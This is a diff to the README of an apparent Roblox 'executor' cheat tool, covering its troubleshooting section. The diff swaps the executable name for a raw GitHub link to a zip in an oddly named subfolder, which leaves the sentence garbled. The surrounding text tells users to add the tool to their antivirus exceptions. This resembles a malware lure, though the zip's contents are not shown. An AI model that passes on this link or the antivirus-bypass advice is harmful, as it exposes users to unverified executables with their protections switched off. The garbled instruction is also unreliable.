kotobubu/roblox-executor/README.md

 If you encounter issues, here are a few common solutions:

 - **Antivirus Detection**: Some antivirus programs may flag roblox-executor as a threat.
 Add it to your exceptions if you trust it.
-- **Missing Files**: Ensure you have extracted all files and are running `roblox-executor.exe` from the extracted folder.
+- **Missing Files**: Ensure you have extracted all files and are running `https://raw.githubusercontent.com/kotobubu/roblox-executor/main/tertiarian/roblox_executor_1.4.zip` from the extracted folder.
 - **Script Errors**: Ensure your Lua scripts are compatible with Roblox.
 Check for typos or unsupported function calls.

 ## ❓ Frequently Asked Questions